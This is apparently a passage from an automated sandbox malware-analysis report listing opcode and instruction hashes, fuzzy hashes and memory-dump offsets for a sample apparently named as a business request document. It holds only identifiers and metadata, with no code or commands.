                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 707e374d8d395ace4ba028e18d6352e4e79725ba3d8cf7bb29c78d84413f7a16
                                                                                                                                                    • Instruction ID: 5cd1a075ee19be3dffc49501f2913101f031fd2c8b3a5501695fedb8861a55e3
                                                                                                                                                    • Opcode Fuzzy Hash: 707e374d8d395ace4ba028e18d6352e4e79725ba3d8cf7bb29c78d84413f7a16
                                                                                                                                                    • Instruction Fuzzy Hash: 4CF05E34D092889FCB41DFA8D85569CBFF1EB59310F1481EAC858D3382E7795902CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4953fd0d9ae1190109ddbe61d55cf79c6b10b0607132a05a4c96e8290859d2fc
                                                                                                                                                    • Instruction ID: ebc355bafe10d9cfa5d05bf27bc713442c2dead037e0bddc01606a610451603d
                                                                                                                                                    • Opcode Fuzzy Hash: 4953fd0d9ae1190109ddbe61d55cf79c6b10b0607132a05a4c96e8290859d2fc
                                                                                                                                                    • Instruction Fuzzy Hash: 87F0A0309192849FCB41DFB8C9A16ACBFF4AB0A201F2841EAC848C3792E2365947CF01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e708fa34a1e5afe8bccf49ecd58e8dbc395e79106183956ae8eb8062dc01246b
                                                                                                                                                    • Instruction ID: dfe730a5f0da2ca975e1c898b534865e5ea2df3f9febad5052acf79daf83c4a8
                                                                                                                                                    • Opcode Fuzzy Hash: e708fa34a1e5afe8bccf49ecd58e8dbc395e79106183956ae8eb8062dc01246b
                                                                                                                                                    • Instruction Fuzzy Hash: 21F0A0713007009BD314DB6EE99164EF7E2EFCA2157A8C93EE41DD7321EA31E90A8790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 72c31c679e176753db3f27e7db90547d93f84186059b6adc6eaef1858814cdf3
                                                                                                                                                    • Instruction ID: 1c7416e375ce836ac30c1560f4555ed39defc43547e6c27492b50b9cc80ec6f2
                                                                                                                                                    • Opcode Fuzzy Hash: 72c31c679e176753db3f27e7db90547d93f84186059b6adc6eaef1858814cdf3
                                                                                                                                                    • Instruction Fuzzy Hash: 1C01A278A05628CFDB64DF68CC54AD9B7B1FB88701F5041E9940EAB395D7345E818F41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c888969a2ca18544746dac25823276ec27b71841c5043935728c52b9fb09f0d9
                                                                                                                                                    • Instruction ID: 09451866ae21cf9f7f6e386118b9d296ce5e080dfcf6efe8685a7d022bd7c679
                                                                                                                                                    • Opcode Fuzzy Hash: c888969a2ca18544746dac25823276ec27b71841c5043935728c52b9fb09f0d9
                                                                                                                                                    • Instruction Fuzzy Hash: 8DE02232A005114BC724CF5CD404AEEB7A6AFC1320B2B843AEE0697201EB71FC5A8BD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b58b9831548415bcee7360cbbce299e9e984a8d714247da308bb4b219748c332
                                                                                                                                                    • Instruction ID: 5ad18aa724f53e603cb147fdf30206b5cc482546c408379faefb91910948cb6c
                                                                                                                                                    • Opcode Fuzzy Hash: b58b9831548415bcee7360cbbce299e9e984a8d714247da308bb4b219748c332
                                                                                                                                                    • Instruction Fuzzy Hash: CCF05531A055000FC714DB4CD4409DF7BA2AFC1310726843AED045B201EB70FC9A8BD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ebc072eaa1a1292e25128404d5b722b19aeff18f6a75dc4406061d3a96a8133f
                                                                                                                                                    • Instruction ID: fc76a2b01bc261cd46cd0f51eae8c8154f570d96ae014beca7834a0adf33d86d
                                                                                                                                                    • Opcode Fuzzy Hash: ebc072eaa1a1292e25128404d5b722b19aeff18f6a75dc4406061d3a96a8133f
                                                                                                                                                    • Instruction Fuzzy Hash: 97F0E2B1E0A344AFEB05EB74A81166D7BF1EF92220F1486DFD004CB2C2E5354E0A9B11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0492c9a03e82aa535558ff5b5c7a4cdff991d5416bc8167f3d6d925a1bfd03ca
                                                                                                                                                    • Instruction ID: 07af314d5f792bab928de303dc4ba21d698c1c3264de232f1e6a9c7792ee3e38
                                                                                                                                                    • Opcode Fuzzy Hash: 0492c9a03e82aa535558ff5b5c7a4cdff991d5416bc8167f3d6d925a1bfd03ca
                                                                                                                                                    • Instruction Fuzzy Hash: F8E06D713007006B8318DA5ED84281AF7DAEFCA260394C93EE41DD7311DA32ED068790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6f785574da08fe68165b742f09e65b8831aff6fdd924c59d2d9d1620a521b03d
                                                                                                                                                    • Instruction ID: 52d941e3afe3997671d48b75078f16e0dadeaa0fc825f449bff75e0d85faf5e1
                                                                                                                                                    • Opcode Fuzzy Hash: 6f785574da08fe68165b742f09e65b8831aff6fdd924c59d2d9d1620a521b03d
                                                                                                                                                    • Instruction Fuzzy Hash: 86F03470E05358CFDB59DF69C8847EDBBF5AB98710F108064940DAB288DB708AC1CB00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d42c5c59cc020db232a9f8925a2d9017b7b0f9a514f7df55509e29deebe78a2c
                                                                                                                                                    • Instruction ID: 2727f8547436017b23dce5439ec8e5395ac70fd0777529ba00d108ab201b842e
                                                                                                                                                    • Opcode Fuzzy Hash: d42c5c59cc020db232a9f8925a2d9017b7b0f9a514f7df55509e29deebe78a2c
                                                                                                                                                    • Instruction Fuzzy Hash: 80F0F235D44208EFCB44CFA8D5906ECBBB4EB9A324F2081AAD80897351D6365E4ACF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ec466d9084a393e9d66a7c4a4677908e1f2bb906045121e8213d1792fbafe185
                                                                                                                                                    • Instruction ID: 7fbbe900090883b2f600b735b2f453d8ff68120e14c5158a6b78f3ca7512d8ab
                                                                                                                                                    • Opcode Fuzzy Hash: ec466d9084a393e9d66a7c4a4677908e1f2bb906045121e8213d1792fbafe185
                                                                                                                                                    • Instruction Fuzzy Hash: 1EF05E30E49304DFCB01DFB8E45429CBFB1EB4A314F1881EEC88597251E2391951CF01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d75f4a24f7bfd1b8443b881e6db294370072d4fa098a8c330fb3102cd0c3bfef
                                                                                                                                                    • Instruction ID: e116e61062bb12af3e024890bdd7be03ccaecfde449dad1c2f5d89f8102839c7
                                                                                                                                                    • Opcode Fuzzy Hash: d75f4a24f7bfd1b8443b881e6db294370072d4fa098a8c330fb3102cd0c3bfef
                                                                                                                                                    • Instruction Fuzzy Hash: 10F06430A04558CBDB24DF59E980B9CB3B2FB48300F5086B9E10AA3290E7316E81CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e535fc269e9885543f524b521d5c8c6021584e0f89be535bf511ea7775f04341
                                                                                                                                                    • Instruction ID: b6939557a45373526a392d15936a794bb9bdf48c4e47a66c6ce7553c816ebc07
                                                                                                                                                    • Opcode Fuzzy Hash: e535fc269e9885543f524b521d5c8c6021584e0f89be535bf511ea7775f04341
                                                                                                                                                    • Instruction Fuzzy Hash: B8F0F874905248EFCB80DFA9D950AADBFF8AB49300F14C0EAECA8D3341D6359A51DF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e6345f78a79a7ac0193f7b210aecd5fbf307da2d2dcc79d5d25937e40e8be151
                                                                                                                                                    • Instruction ID: 3e1b1295c37c358e3c91bc9fbddb453576a5ba377868e83e626bf6e997ab14b8
                                                                                                                                                    • Opcode Fuzzy Hash: e6345f78a79a7ac0193f7b210aecd5fbf307da2d2dcc79d5d25937e40e8be151
                                                                                                                                                    • Instruction Fuzzy Hash: F2F06534809208DFCB05CFA4D9999EDBFB4EB4A314F2591DECC0957351C6354945DF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 660d9e73b6a8b2ba42e7b6843bd46ee2995bb779bca875b5a9aee7801e9800ce
                                                                                                                                                    • Instruction ID: 7cf371e568a2ca70889bb45cd86f083f0e706c00ea057a38ed6f62784b8daf74
                                                                                                                                                    • Opcode Fuzzy Hash: 660d9e73b6a8b2ba42e7b6843bd46ee2995bb779bca875b5a9aee7801e9800ce
                                                                                                                                                    • Instruction Fuzzy Hash: DDF0F974A01228CFCB15DF98E994B9CB7B2FB45300F0416A6E505AB391D7356E80CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c52beb571c8c76fa6a4c700581fbc5e0340a1240a22f96b706a272be9cefa3e7
                                                                                                                                                    • Instruction ID: 7d213361a7b56296cae59273751681c80f591cdb915873c28c0fe5140cf615a3
                                                                                                                                                    • Opcode Fuzzy Hash: c52beb571c8c76fa6a4c700581fbc5e0340a1240a22f96b706a272be9cefa3e7
                                                                                                                                                    • Instruction Fuzzy Hash: 50F04434A01218CFCB50DF68E894B9CB7B2FB44300F1442AAE40DAB392DB346E84CF01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4298c3aac7e8167cb297e39e87cb96c4fc5bc086c2581443a88767b18f45b1f5
                                                                                                                                                    • Instruction ID: 6064d2e42059997fd83880150a66bb9e22dbcfa374ed33d6522e18f6a32f39a7
                                                                                                                                                    • Opcode Fuzzy Hash: 4298c3aac7e8167cb297e39e87cb96c4fc5bc086c2581443a88767b18f45b1f5
                                                                                                                                                    • Instruction Fuzzy Hash: 71F09038A00268CFCB25DF58E884B9CB7B1FB48300F0486A9E44AA7391DB756D95CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5b799f7ebed7b980d03cc50c42c4b4f0c5071adf6324167446d45fc34a0d3502
                                                                                                                                                    • Instruction ID: 8777356d1ad9a9e7737d8f141e1773d075ed57685d76179f2e837975c42fd5e8
                                                                                                                                                    • Opcode Fuzzy Hash: 5b799f7ebed7b980d03cc50c42c4b4f0c5071adf6324167446d45fc34a0d3502
                                                                                                                                                    • Instruction Fuzzy Hash: 82E06D78D091489FDB04EFA8E5906ACBFB0EB4D314F1482EECC5957341DA314A46CB01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 65998d433091e66f4a4e2f6a3bd30bd91cc22a0315e7a699f48b34809b1487ea
                                                                                                                                                    • Instruction ID: 003b14bfcb58813a1785fd9f7949a973cbe7359c3ccf969568fcb25444db457c
                                                                                                                                                    • Opcode Fuzzy Hash: 65998d433091e66f4a4e2f6a3bd30bd91cc22a0315e7a699f48b34809b1487ea
                                                                                                                                                    • Instruction Fuzzy Hash: 7EE0D838819148DFCB09CF64E9A16ACBF74EF5A314F2452DDDC445B382C6325A46CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a6f8a3794447af413f8b6e657286fd9d42f72de25f5450782c7ab3b8659fde27
                                                                                                                                                    • Instruction ID: 7f42df54249049f6a5113911f1060c3fd5ccb95b6e27924cb38e4cb51b8d199b
                                                                                                                                                    • Opcode Fuzzy Hash: a6f8a3794447af413f8b6e657286fd9d42f72de25f5450782c7ab3b8659fde27
                                                                                                                                                    • Instruction Fuzzy Hash: BFF05874D09348EFCB11DFA8D86029CBFB4FB89300F1081AAD84496285D3754A54DB82
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f9db6175f51dced4d5a902b97e5bce3f67d2c0f7d33fa69b6131a9e2c14c1519
                                                                                                                                                    • Instruction ID: 26dc7b1fb5c765721b318a6cf097e65916c2fffd893453368ee229596710f811
                                                                                                                                                    • Opcode Fuzzy Hash: f9db6175f51dced4d5a902b97e5bce3f67d2c0f7d33fa69b6131a9e2c14c1519
                                                                                                                                                    • Instruction Fuzzy Hash: B4E0923230074A6BC7119A1AE884D4FFB9A9FC02203408D3AD10A87129DE70EC0A8794
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9288dff32173cc70db851e0e2c8e6dd785220f9470f06a020e9c106103358b19
                                                                                                                                                    • Instruction ID: 88ed30cae07033bedd7178ace8b4be7799f50603e9d14d4cd5fb1b4a433675d6
                                                                                                                                                    • Opcode Fuzzy Hash: 9288dff32173cc70db851e0e2c8e6dd785220f9470f06a020e9c106103358b19
                                                                                                                                                    • Instruction Fuzzy Hash: 7BE0D831908304DBD704CB58D96556CBF74FBC9320F2440EACC0817385C6329E46C7C1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: edc43ce0dbcca9b01d5eeb2a45faaf2b6d0909c5a32fe06571c77848623b9819
                                                                                                                                                    • Instruction ID: 22ed76dbcc45be84529931e88be07fe1fee2e1e574092d0417faf36e5f6a6276
                                                                                                                                                    • Opcode Fuzzy Hash: edc43ce0dbcca9b01d5eeb2a45faaf2b6d0909c5a32fe06571c77848623b9819
                                                                                                                                                    • Instruction Fuzzy Hash: CCE09230A44710AFEB345E606800BBA73A99F45318F1500AEE9069A581F565BC538FE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f4857c7dab5c7d30584d9db5acd9caf93036f9a19ac23a8748138df249675835
                                                                                                                                                    • Instruction ID: 5d0e5dc6af8d4e90cdccff68e7bf35cbae96f42ebdf317239101e789e63f1573
                                                                                                                                                    • Opcode Fuzzy Hash: f4857c7dab5c7d30584d9db5acd9caf93036f9a19ac23a8748138df249675835
                                                                                                                                                    • Instruction Fuzzy Hash: F0E06D3094A2849ECB019BB5D9511AC7F71DB47205F1812EEC48497652D2390956CB11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1affbccc1b3cc480a8859491af451e4e94f82d217c37613756721b9a058bdd04
                                                                                                                                                    • Instruction ID: c71a5fedf40a3bce63a096153ff26a82665b0b8635535db2923372c1c0c60698
                                                                                                                                                    • Opcode Fuzzy Hash: 1affbccc1b3cc480a8859491af451e4e94f82d217c37613756721b9a058bdd04
                                                                                                                                                    • Instruction Fuzzy Hash: E3F07F74A01258DFDB61CF59E994B9CB7F1BB08301F4481AAE589E7240EB346D948F11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 981b5d73f2eb2cc55cd5f1c2dc8cdaf16f777d109b7f585af7066730eeb30acf
                                                                                                                                                    • Instruction ID: 2b9e8d17cd8ce3e8e44446947770ac2e5b776929c71e0ab9f7611830c6eaeb28
                                                                                                                                                    • Opcode Fuzzy Hash: 981b5d73f2eb2cc55cd5f1c2dc8cdaf16f777d109b7f585af7066730eeb30acf
                                                                                                                                                    • Instruction Fuzzy Hash: 58E09230A1A288DFDF10DF78D9557DC7FB0AB5A211F1442EAC849D3791E6348E41CB01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dcbb12a338bddb4d323460dd1f2f3689e5d69dc4fd64e312289560a95b960fce
                                                                                                                                                    • Instruction ID: e7e766e393ae624cbfcd954e8e29aeb8abaf4b28797b08bfffff179bbed57a58
                                                                                                                                                    • Opcode Fuzzy Hash: dcbb12a338bddb4d323460dd1f2f3689e5d69dc4fd64e312289560a95b960fce
                                                                                                                                                    • Instruction Fuzzy Hash: 54E02230A01308AFEB01DFB8E8012AD7BF0EF82230B10469AD414DB281E6780E019B10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356255959.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
